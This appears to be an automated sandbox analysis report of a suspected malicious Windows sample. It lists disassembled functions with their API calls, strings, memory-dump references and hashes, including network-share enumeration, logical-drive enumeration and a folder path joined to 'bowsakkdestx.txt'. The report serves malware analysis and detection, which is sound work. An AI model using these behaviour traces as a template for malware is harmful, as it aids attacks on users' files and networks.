                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004853AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 0048594A
                                                                                                                              • Part of subcall function 00488AF7: __mtinitlocknum.LIBCMT ref: 00488B09
                                                                                                                              • Part of subcall function 00488AF7: __amsg_exit.LIBCMT ref: 00488B15
                                                                                                                              • Part of subcall function 00488AF7: EnterCriticalSection.KERNEL32(i;H,?,004850D7,0000000D), ref: 00488B22
                                                                                                                            • _free.LIBCMT ref: 00485970
                                                                                                                              • Part of subcall function 00480BED: HeapFree.KERNEL32(00000000,00000000,?,0048507F,00000000,0048520D,00480CE9), ref: 00480C01
                                                                                                                              • Part of subcall function 00480BED: GetLastError.KERNEL32(00000000,?,0048507F,00000000,0048520D,00480CE9), ref: 00480C13
                                                                                                                            • __lock.LIBCMT ref: 00485989
                                                                                                                            • ___removelocaleref.LIBCMT ref: 00485998
                                                                                                                            • ___freetlocinfo.LIBCMT ref: 004859B1
                                                                                                                            • _free.LIBCMT ref: 004859C4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 626533743-0
                                                                                                                            • Opcode ID: def75f6cb6d0d672af9e4d6134873646e57e7698413cfa20c796f933f604dfc0
                                                                                                                            • Instruction ID: ca6944bc949019f202863d08ba26eb14c31e2e8531f725297b27a775bf5e9a09
                                                                                                                            • Opcode Fuzzy Hash: def75f6cb6d0d672af9e4d6134873646e57e7698413cfa20c796f933f604dfc0
                                                                                                                            • Instruction Fuzzy Hash: 0E015BB1502B00E6DA34BBA9D846B1E72A06F00739F604E5FE4646A2D5CFBC9980DB5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004B73F0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: $+$0123456789ABCDEF$UlK
                                                                                                                            • API String ID: 1302938615-392471189
                                                                                                                            • Opcode ID: e59e0865a7e7feb91efd8b9ec14c9ffceac109d8c26e1e14746f299abae5350b
                                                                                                                            • Instruction ID: 5d79033a0d1641cee28c1ec0bcd5030b108edf4232128083af2b5817aebdf2d9
                                                                                                                            • Opcode Fuzzy Hash: e59e0865a7e7feb91efd8b9ec14c9ffceac109d8c26e1e14746f299abae5350b
                                                                                                                            • Instruction Fuzzy Hash: 74818DB1A087509FD720CF298840A6BBBE5BFC8754F15091EF989A3352D338DD058BA6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004B06A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 004B07C3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                            • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                            • API String ID: 601868998-2416195885
                                                                                                                            • Opcode ID: d253b54df10fdedd9026f4ed7fc5f906658a5d3edb13d4881b46fbc6cab53c8e
                                                                                                                            • Instruction ID: 8a5badbd6d10ce0d3b27618c4de3becb9d81d01ee054be2f893b7bfdee36208f
                                                                                                                            • Opcode Fuzzy Hash: d253b54df10fdedd9026f4ed7fc5f906658a5d3edb13d4881b46fbc6cab53c8e
                                                                                                                            • Instruction Fuzzy Hash: 3641E771A043059BDB24EE15CC45BEFB7D8EF85349F00082FF58593241EA79E9098BB6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004BAE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: .\crypto\buffer\buffer.c$g9L
                                                                                                                            • API String ID: 2102423945-957670896
                                                                                                                            • Opcode ID: 17f1ebc54ed39b968f6035c0df2cf15f5b91dbb67fd3db8f6bda8d49f181cf43
                                                                                                                            • Instruction ID: 7dc351e9e75f57ed17621435b292e6d8d9c7ecc1bf5e76977484c5a99075eabc
                                                                                                                            • Opcode Fuzzy Hash: 17f1ebc54ed39b968f6035c0df2cf15f5b91dbb67fd3db8f6bda8d49f181cf43
                                                                                                                            • Instruction Fuzzy Hash: 352106B6B403213FE214665DFC42B96B399EB84B18F10442AF208D72C2D374E821C3E9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00525D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd_noexit.LIBCMT ref: 00525D3D
                                                                                                                              • Part of subcall function 0048501F: GetLastError.KERNEL32(?,i;H,0048520D,00480CE9,?,?,00483B69,?), ref: 00485021
                                                                                                                              • Part of subcall function 0048501F: __calloc_crt.LIBCMT ref: 00485042
                                                                                                                              • Part of subcall function 0048501F: __initptd.LIBCMT ref: 00485064
                                                                                                                              • Part of subcall function 0048501F: GetCurrentThreadId.KERNEL32 ref: 0048506B
                                                                                                                              • Part of subcall function 0048501F: SetLastError.KERNEL32(00000000,i;H,0048520D,00480CE9,?,?,00483B69,?), ref: 00485083
                                                                                                                            • __calloc_crt.LIBCMT ref: 00525D60
                                                                                                                            • __get_sys_err_msg.LIBCMT ref: 00525D7E
                                                                                                                            • __get_sys_err_msg.LIBCMT ref: 00525DCD
                                                                                                                            Strings
                                                                                                                            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00525D48, 00525D6E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                            • API String ID: 3123740607-798102604
                                                                                                                            • Opcode ID: fde893ec371491eb85b18ef26a26a6ad5d2eeb319d9bd56ae6f087a2f6bc219d
                                                                                                                            • Instruction ID: 0b4f772ee93538a19ccd2b473515f8b46fe559c533960dc63fdf19f0a1aaaaa0
                                                                                                                            • Opcode Fuzzy Hash: fde893ec371491eb85b18ef26a26a6ad5d2eeb319d9bd56ae6f087a2f6bc219d
                                                                                                                            • Instruction Fuzzy Hash: 4511B671541E256BEB213B76AC05ABF7BDCFF427A4F10086AFE0596281F6359E0043E5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004C2FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _fprintf_memset
                                                                                                                            • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                                            • API String ID: 3021507156-3399676524
                                                                                                                            • Opcode ID: c7d33753fda1f25bb4e1baa35efbca834d53d9e793a2b57c0c3adb884eea200e
                                                                                                                            • Instruction ID: 369716b1bf070bcdf10903e5072480642b3b08e19738a687f3b07712abc9855d
                                                                                                                            • Opcode Fuzzy Hash: c7d33753fda1f25bb4e1baa35efbca834d53d9e793a2b57c0c3adb884eea200e
                                                                                                                            • Instruction Fuzzy Hash: C8215B76A443113BE720A9275C02FBB7799DFC1B9CF04481EFE50672C6D625DD0642B9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0046C51B
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0046C539
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 29327785-2616962270
                                                                                                                            • Opcode ID: cbcfc4bda323e745c456afee00f882580d6114fdb5cf63951838856d921a9a62
                                                                                                                            • Instruction ID: 45748298a9b2119e8af203546cdad32feeb125941ba6ea97c4375ee677fe02b2
                                                                                                                            • Opcode Fuzzy Hash: cbcfc4bda323e745c456afee00f882580d6114fdb5cf63951838856d921a9a62
                                                                                                                            • Instruction Fuzzy Hash: 43110AB2B4122833D930756A6C87FEF775C9F52B26F0004A7FE0CD2142B5AA995942E6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0047BAAD
                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0047BABE
                                                                                                                            • UpdateWindow.USER32(00000000), ref: 0047BAC5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateShowUpdate
                                                                                                                            • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                            • API String ID: 2944774295-3503800400
                                                                                                                            • Opcode ID: 210611b276f7045e50f6d2029047f6ffd23811cd4b8924b9dd051efc836933f7
                                                                                                                            • Instruction ID: cb306d8098a1dfe9ad6d2ff6ae07a41a6921f64a229ffaf82036fab704ca95e4
                                                                                                                            • Opcode Fuzzy Hash: 210611b276f7045e50f6d2029047f6ffd23811cd4b8924b9dd051efc836933f7
                                                                                                                            • Instruction Fuzzy Hash: A7E04F3168172077E33197147C0BF9A2D14FB22F20F30440AFA047A2D1C6E56D46AADC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00470BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00470C12
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00470C39
                                                                                                                            • _memset.LIBCMT ref: 00470C4C
                                                                                                                            • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00470C63
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 364255426-0
                                                                                                                            • Opcode ID: 14a599b6641820a1c122b34ddaa8676d956fbb990af6d687e0bb81f19fa0ad9f
                                                                                                                            • Instruction ID: 63a4e8f6962ec392745d8534c2be191d99f75d06ba2b00070369b7ec8858da79
                                                                                                                            • Opcode Fuzzy Hash: 14a599b6641820a1c122b34ddaa8676d956fbb990af6d687e0bb81f19fa0ad9f
                                                                                                                            • Instruction Fuzzy Hash: A5919C75608341CFD728DF68C891BABB7E1FF84704F14891EE48A87381E778A944CB5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004A16EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getenv_helper_nolock.LIBCMT ref: 004A1726
                                                                                                                            • _strlen.LIBCMT ref: 004A1734
                                                                                                                              • Part of subcall function 00485208: __getptd_noexit.LIBCMT ref: 00485208
                                                                                                                            • _strnlen.LIBCMT ref: 004A17BF
                                                                                                                            • __lock.LIBCMT ref: 004A17D0
                                                                                                                            • __getenv_helper_nolock.LIBCMT ref: 004A17DB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2168648987-0
                                                                                                                            • Opcode ID: 1791b7398efab0c146be4faa36226a3136affcb659c0aa102ddf8d75078d5612
                                                                                                                            • Instruction ID: 84d36f6f7b23f9a605ec562353b62274fdcdd37fd3cb2a3fc24995b5777e5858
                                                                                                                            • Opcode Fuzzy Hash: 1791b7398efab0c146be4faa36226a3136affcb659c0aa102ddf8d75078d5612
                                                                                                                            • Instruction Fuzzy Hash: 4B31593AA04225ABDB217BB9CC01BAF37949F22B64F14051BF814DB391DF7C880087AD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00470A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLogicalDrives.KERNEL32 ref: 00470A75
                                                                                                                            • SetErrorMode.KERNEL32(00000001,00560234,00000002), ref: 00470AE2
                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 00470AF9
                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00470B02
                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 00470B1B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2560635915-0
                                                                                                                            • Opcode ID: 02f7d117f14ed44ceaf091d6bc54c1454ef3d521f86efdabc7b5ecfa1e174514
                                                                                                                            • Instruction ID: bd8aab77d4dc06a575ef99882456f81d4586d1f62c398e00fd53c594da8c4aeb
                                                                                                                            • Opcode Fuzzy Hash: 02f7d117f14ed44ceaf091d6bc54c1454ef3d521f86efdabc7b5ecfa1e174514
                                                                                                                            • Instruction Fuzzy Hash: 6C41AF71109340DFC720DF68C895B5FBBE4BF95718F500A1EF089962A2D7B99604CB97
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0049B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 0049B70B
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A90000,00000000,00000001,?,?,?,?,00483B69,?), ref: 00480CA5
                                                                                                                            • _free.LIBCMT ref: 0049B71E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
